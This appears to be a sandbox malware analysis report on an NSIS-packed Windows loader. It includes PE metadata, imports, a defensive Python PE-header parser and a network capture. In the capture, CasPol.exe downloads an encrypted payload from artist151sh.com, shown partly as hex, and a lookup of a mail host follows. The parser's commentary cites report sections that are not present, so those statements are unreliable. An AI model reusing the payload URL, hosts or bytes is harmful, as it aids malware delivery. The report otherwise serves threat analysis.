IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6676 | 0x6800 | False | 0.656813401442 | data | 6.41745998719 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.14106681717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20378 | 0x600 | False | 0.509765625 | data | 4.11058212765 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x2b000 | 0x27000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x52000 | 0x63d38 | 0x63e00 | False | 0.295598990926 | data | 5.64645184571 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_BITMAP | 0x523d0 | 0x368 | data | English | United States
RT_ICON | 0x52738 | 0x4180c | data | English | United States
RT_ICON | 0x93f48 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | United States
RT_ICON | 0xa4770 | 0x94a8 | data | English | United States
RT_ICON | 0xadc18 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0xb1e40 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 95 | English | United States
RT_ICON | 0xb43e8 | 0x988 | data | English | United States
RT_ICON | 0xb4d70 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0xb51d8 | 0xb8 | data | English | United States
RT_DIALOG | 0xb5290 | 0x144 | data | English | United States
RT_DIALOG | 0xb53d8 | 0x13c | data | English | United States
RT_DIALOG | 0xb5518 | 0x100 | data | English | United States
RT_DIALOG | 0xb5618 | 0x11c | data | English | United States
RT_DIALOG | 0xb5738 | 0x60 | data | English | United States
RT_GROUP_ICON | 0xb5798 | 0x68 | data | English | United States
RT_VERSION | 0xb5800 | 0x1f4 | data | English | United States
RT_MANIFEST | 0xb59f8 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Description | Data
ProductName | Wadiesant
FileDescription | Unpackagedfotomo
FileVersion | 19.29.0
Comments | CHONDROITI
CompanyName | Conteketra
Translation | 0x0409 0x04b0
Language of compilation system | Country where language is spoken | Map
English | United States
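The static section above (compile timestamp, file and DLL characteristics, section table with per-section entropy, entry-point section) can be reproduced without a sandbox. What follows is an added example, not Joe Sandbox code and not part of the sample: a pure-Python PE32 header parser that decodes those fields and raises the checks an analyst wants from them: a section with no raw data but a large virtual size (the .ndata section above, uninitialized data the NSIS stub populates at runtime), sections with entropy above 7 bits per byte, writable-and-executable sections, and DYNAMIC_BASE set on an image whose relocations are stripped and whose BASERELOC directory is empty (as above), which means the loader cannot move it away from 0x400000 despite ASLR. The image it parses is constructed inline so the script runs offline; its header values copy the report's numbers, the section bytes are synthetic, and the real sample is not needed. One caveat it also demonstrates: the 657569-byte file written by CasPol.exe above has the sample's size and a near-identical SSDEEP but a preview that begins ".Z", so the first byte of the MZ signature has been altered; a parser keyed on that signature (this one included) rejects such a file, consistent with the report's "data" file type for it.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# Flag tables: the winnt.h values behind the names in the report's static section.
FILE_CHARACTERISTICS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
                        0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
                        0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
SECTION_FLAGS = {0x20: "CNT_CODE", 0x40: "CNT_INITIALIZED_DATA", 0x80: "CNT_UNINITIALIZED_DATA",
                 0x20000000: "MEM_EXECUTE", 0x40000000: "MEM_READ", 0x80000000: "MEM_WRITE"}

def flag_names(value, table):
    return [name for bit, name in table.items() if value & bit]

def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 to 8.0), the 'Entropy (8bit)' figure above."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def parse_pe(image: bytes) -> dict:
    """Parse DOS/NT headers and the section table of a PE32 image; return fields plus findings."""
    if image[:2] != b"MZ":
        raise ValueError("MZ signature missing: not a PE image (or its first bytes were altered)")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing at e_lfanew")
    fh = e_lfanew + 4
    machine, nsections, tstamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", image, fh)
    opt = fh + 20                                   # IMAGE_OPTIONAL_HEADER32 follows the file header
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    entry = struct.unpack_from("<I", image, opt + 16)[0]          # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", image, opt + 28)[0]     # ImageBase
    subsystem, dll_chars = struct.unpack_from("<HH", image, opt + 68)
    file_flags = flag_names(chars, FILE_CHARACTERISTICS)
    dll_flags = flag_names(dll_chars, DLL_CHARACTERISTICS)
    sections, findings, entry_section = [], [], None
    for i in range(nsections):
        off = opt + opt_size + 40 * i               # IMAGE_SECTION_HEADER is 40 bytes
        (name, vsize, vaddr, raw_size, raw_ptr,
         _, _, _, _, sflags) = struct.unpack_from("<8sIIIIIIHHI", image, off)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        ent = shannon_entropy(image[raw_ptr:raw_ptr + raw_size] if raw_size else b"")
        sections.append({"name": name, "vaddr": vaddr, "vsize": vsize, "raw_size": raw_size,
                         "entropy": ent, "flags": flag_names(sflags, SECTION_FLAGS)})
        if vaddr <= entry < vaddr + max(vsize, raw_size):
            entry_section = name
        if raw_size == 0 and vsize:
            findings.append(f"{name}: 0 bytes on disk but 0x{vsize:x} reserved in memory (filled at runtime)")
        if ent > 7.0:
            findings.append(f"{name}: entropy {ent:.2f} suggests packed or encrypted content")
        if sflags & 0x80000000 and sflags & 0x20000000:
            findings.append(f"{name}: writable and executable")
    if entry_section is None:
        findings.append(f"entry point 0x{entry:x} lies outside every section")
    if "DYNAMIC_BASE" in dll_flags and "RELOCS_STRIPPED" in file_flags:
        findings.append("DYNAMIC_BASE set but relocations stripped: the loader cannot rebase, "
                        f"so the image stays at 0x{image_base:x} despite ASLR")
    return {"machine": machine,
            "timestamp": datetime.fromtimestamp(tstamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
            "characteristics": file_flags, "dll_characteristics": dll_flags, "subsystem": subsystem,
            "entry_point": entry, "entry_section": entry_section, "image_base": image_base,
            "sections": sections, "findings": findings}

def build_sample_pe() -> bytes:
    """Constructed PE32 image (an assumption, not the real sample): header values copy the report's
    static section, the three sections' bytes are synthetic."""
    nsec, opt_size = 3, 96                          # optional header without data directories
    hdr_end = 0x40 + 4 + 20 + opt_size + 40 * nsec  # 304: raw section data starts here
    text_raw = bytes(range(32))                     # 32 distinct byte values -> entropy exactly 5.0
    data_raw = bytes(16)                            # all zeros -> entropy 0.0
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)                    # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, nsec, 0x614F9B1F, 0, 0, opt_size, 0x010F)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)           # PE32 magic
    struct.pack_into("<I", opt, 16, 0x3640)         # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)       # ImageBase
    struct.pack_into("<HH", opt, 68, 2, 0x8540)     # GUI; NO_SEH|TS_AWARE|DYNAMIC_BASE|NX_COMPAT

    def sec(name, vsize, vaddr, raw_size, raw_ptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, raw_size, raw_ptr, 0, 0, 0, 0, flags)

    sections = (sec(b".text", 0x6676, 0x1000, len(text_raw), hdr_end, 0x60000020)
                + sec(b".data", 0x20378, 0xA000, len(data_raw), hdr_end + len(text_raw), 0xC0000040)
                + sec(b".ndata", 0x27000, 0x2B000, 0, 0, 0xC0000080))
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + sections + text_raw + data_raw

if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print(info["timestamp"], info["characteristics"], info["dll_characteristics"], info["entry_section"])
    for f in info["findings"]:
        print("finding:", f)
```

Run against a real file with parse_pe(open(path, "rb").read()); the entropy figures will then match the report's "Entropy (8bit)" values for each section, and a section scoring near 8.0 is the usual place to look for the encrypted payload of a loader.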
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 20:56:40.121280909 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.135859966 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.136087894 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.136708021 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.153284073 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174237013 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174325943 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174374104 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174420118 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174436092 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.174478054 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.174484015 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174557924 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174563885 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.174606085 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174653053 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174685001 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.174698114 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174707890 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.174745083 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.174818039 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.174881935 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.188440084 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.188500881 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.188679934 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.188827991 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.188889027 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.188939095 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189019918 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189040899 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189063072 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189126968 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189172983 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189218044 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189225912 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189264059 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189265013 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189311028 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189357042 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189378023 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189402103 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189415932 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189449072 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189495087 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189532042 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189539909 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189569950 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189585924 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189631939 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189677954 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189688921 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189723969 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.189727068 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189870119 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.189908028 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.205387115 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.205545902 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.205607891 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.205625057 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.205673933 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.205719948 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.205735922 CEST | 49761 | 80 | 192.168.11.20 | 50.7.115.119
May 27, 2022 20:56:40.205765963 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
May 27, 2022 20:56:40.205811977 CEST | 80 | 49761 | 50.7.115.119 | 192.168.11.20
                                  May 27, 2022 20:56:40.205857992 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205878973 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.205903053 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205949068 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205950975 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.205996037 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.205998898 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206042051 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206058025 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206089020 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206134081 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206180096 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206221104 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206224918 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206269026 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206270933 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206319094 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206367016 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206387997 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206413984 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206425905 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206460953 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206526995 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206543922 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206592083 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206598997 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206636906 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206682920 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206687927 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206728935 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206773996 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206820011 CEST804976150.7.115.119192.168.11.20
                                  May 27, 2022 20:56:40.206867933 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206917048 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.206994057 CEST4976180192.168.11.2050.7.115.119
                                  May 27, 2022 20:56:40.209398985 CEST804976150.7.115.119192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 20:56:39.557692051 CEST | 53681 | 53 | 192.168.11.20 | 1.1.1.1
May 27, 2022 20:56:40.112021923 CEST | 53 | 53681 | 1.1.1.1 | 192.168.11.20
May 27, 2022 20:58:17.623646021 CEST | 59959 | 53 | 192.168.11.20 | 1.1.1.1
May 27, 2022 20:58:17.871989965 CEST | 53 | 59959 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 27, 2022 20:56:39.557692051 CEST | 192.168.11.20 | 1.1.1.1 | 0x6bde | Standard query (0) | artist151sh.com | A (IP address) | IN (0x0001)
May 27, 2022 20:58:17.623646021 CEST | 192.168.11.20 | 1.1.1.1 | 0x9b21 | Standard query (0) | mail.paralikgroup.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 27, 2022 20:56:40.112021923 CEST | 1.1.1.1 | 192.168.11.20 | 0x6bde | No error (0) | artist151sh.com | (none) | 50.7.115.119 | A (IP address) | IN (0x0001)
May 27, 2022 20:58:17.871989965 CEST | 1.1.1.1 | 192.168.11.20 | 0x9b21 | No error (0) | mail.paralikgroup.com | (none) | 173.254.28.216 | A (IP address) | IN (0x0001)
                                  • artist151sh.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49761 | 50.7.115.119 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Timestamp | kBytes transferred | Direction | Data
May 27, 2022 20:56:40.136708021 CEST | 10517 | OUT | GET /paralikgroup%20ori%204_vJdEAWVzP17.bin HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Host: artist151sh.com
                                  Cache-Control: no-cache
May 27, 2022 20:56:40.174237013 CEST | 10518 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 27 May 2022 18:56:40 GMT
                                  Server: Apache
                                  Last-Modified: Fri, 27 May 2022 14:17:16 GMT
                                  Accept-Ranges: bytes
                                  Content-Length: 221760
                                  Content-Type: application/octet-stream
                                  Data Raw: 26 a4 27 e7 4a b4 a0 c7 06 04 e5 1c 43 72 a8 95 7f 12 5d e9 b1 d8 3c 61 d6 ee 7e c6 84 ba d7 85 30 e1 b4 f5 be 0e 9a 07 af 44 43 79 05 26 17 13 4e b3 cc 6d c5 d3 d0 0f cb a9 91 43 5d c5 39 02 7a 96 fd a5 df 50 99 63 94 11 a1 fe 7a 43 28 55 63 90 d0 d6 a2 2e 15 5f 64 cd 99 a8 85 91 9f c9 e7 c3 fb 74 1e a3 51 df e3 dd e8 c3 8c a4 fc 81 aa 10 15 cb 43 b8 2f 5a 41 08 7b 9a f1 8b fa 4f ae fb 57 9d a4 9f 99 84 74 c2 b8 8f 3c 07 15 bb 79 18 85 7a 4d ff ae 98 b6 29 6f 99 a3 69 d9 7e 8f a8 b8 f4 9f 17 59 92 8a 24 03 d0 52 31 51 3e df d6 e7 93 90 06 1b fe ac eb 26 76 9d 51 4b 36 b1 73 d8 d6 b9 52 ae 5f 7a d5 d8 b9 ea 3e 32 94 3e 27 88 f5 fe 58 f2 96 a8 2c b1 4d 0f 91 d8 64 ad 61 ce 0b d5 ad 31 e2 32 2a b5 d1 16 7e 98 bb 4b 22 c4 6c 5a d7 c3 a9 70 74 73 5b ab bc 31 17 cf 06 41 d4 01 81 90 fa c1 cc 14 90 e6 b0 34 b9 58 1b 5b dc 54 59 87 7c 0b 2b 27 2f f7 c8 f1 74 01 43 c8 d4 d6 70 8a b8 cd bf ac 97 4e 47 82 89 70 be 50 81 33 48 dd 1d 65 2b 95 b8 2f 41 9e 79 93 5e c4 ec a3 22 dc 80 6d b7 69 80 1e d6 7d ed e1 cf 6b 8e 4e 1a 78 f1 00 a7 12 cc 3e 5b d7 d6 d9 2e ba 50 ca 90 82 7c 05 d3 d1 16 28 79 90 91 fc 0f b4 97 63 bb e6 1b 19 c9 ef cd 5b e9 f0 25 78 71 84 e2 d9 bf 44 27 65 2c e1 d8 21 90 5a 2d 43 b5 8a 2b 6f f7 b3 ba 30 a3 07 80 be a7 5f d5 13 74 d3 58 b1 d8 02 0a 3c a9 d0 1e ff 6f 89 90 0e 12 4d 48 a6 cc b4 1f 31 7f 75 62 05 c7 03 d0 5c 76 5f 25 4e 57 45 da e7 99 ad 66 c9 85 f0 71 cb e6 b0 e6 2d 65 57 ba fa 6a db be 61 b2 50 43 93 2f 42 dd ad ea b1 e0 09 86 69 71 0b b6 23 b5 77 6d 07 c9 17 1a c5 ea 5f 97 23 0f 4b 34 73 6c c9 9a 9a d3 6e 50 29 2a 02 b5 eb 4d c0 c6 b7 e3 49 5a a9 da 08 f0 4a 11 95 67 de 67 e0 bf 02 84 ec 5f 24 49 1b 5a 80 a5 e3 cf 72 d3 68 47 66 b6 fa 49 63 d9 8a 78 c2 53 63 09 f7 5a 90 45 09 06 59 44 9f f9 ac 0a 16 79 4c d0 57 b6 4c 36 8d ea 6b 43 9a 32 c6 93 c6 8e e2 c2 0d d2 e4 06 da 32 ff ed 21 40 b9 cf 23 e2 b6 70 9c 12 29 cb 50 ea 3c 34 b6 a4 5a c0 71 78 1f 37 84 66 9f e3 8e 7e 5a 05 9d 72 c8 b8 96 ad e2 ef 1e 79 
6a 93 59 e7 c3 35 4c 77 21 aa c6 e9 6d 12 6c ab e1 a1 38 cb 10 8c 99 43 ea 4d 80 60 ee e4 2d 8b f3 91 ab 72 2e ca fd 2d b1 9f ba c0 34 13 2e 96 4d 77 d9 4a ce 1d ae bf 29 81 74 92 df 92 a0 04 86 f3 5a 83 39 e4 f0 5c 18 7c 74 ea 8f ec f7 7b 31 32 a0 c9 68 1d 82 41 be c0 7a fc 5f 76 95 5c ce 62 47 02 61 0e 8c f1 af 24 6e 87 be 9c 26 ee 7c 1b 86 b5 60 88 83 73 9d 01 d8 09 e4 24 61 c2 c4 6d 68 89 9a a2 af 90 9d 85 2e 85 5c 3d 20 06 77 c5 77 13 74 3e 3e 93 78 c7 db 49 77 ef 50 80 c7 57 72 56 70 c1 0e b0 46 08 14 44 75 21 28 43 7e 02 d2 8e 7a c6 cb d9 c9 bc 86 26 de 12 ce 66 03 e1 74 f5 f2 97 ad 19 1b ea d0 12 57 55 ad 88 80 b1 99 36 56 53 ea cb 8e 91 31 fa 9f ed 0f c4 0b c5 13 75 9f 78 34 c6 de 9b eb c7 16 79 57 f7 b4 07 93 bf 0f 45 48 ce 0e a5 9a c9 8f 23 15 f4 f9 18 52 44 57 e3 16 aa 51 e4 b3 76 41 42 1b 84 67 00 dc 14 77 9a 43 e7 ae f7 c4 1d 2a 5c 55 b4 ce 9f ae cb f9 a6 2f fa e8 c1 c4 91 9f 3c e7 76 a5 db 47 67 62 bc 13 b9 f5 85 bb 3e ab da bc d2 c1 a9 2e 12 47 da cc b5 aa ae 93 b4 2a e5 c0 d3 65 1e a3 5b f7 f1 dd e8 c9 a6 a4 fc 92 9a 12 15 e3 43 b8 2f 5c 41 08 6a 8c 7a a0 e1 4f a7 f3 13 92 88 29 88 42 55 7d af 3d f0 0a 43 c4 1b 6b a2 12 c1 91 e5 e8 fc 46 64 19 c0 2f a4 11 fb 82 f0 82 8f 67 2c d0 aa 4d 6d f7 16 7e 13 08 b9 92 98 f6 b9 1c e8 f5 a4 e9 3e 7d 9d 56 5d c8 e0 1a da c1 fe 53 aa 47 20 c6 15 da c1 3c 19 77 ee 22 88 f5 1c 70 e4 97 a3 27 90 5e 3f cb db 4c ad 69 ce 03 d5 ad 20 f4 17 77 ad d1 11 49 66 ba 67 20 dc 67 5a
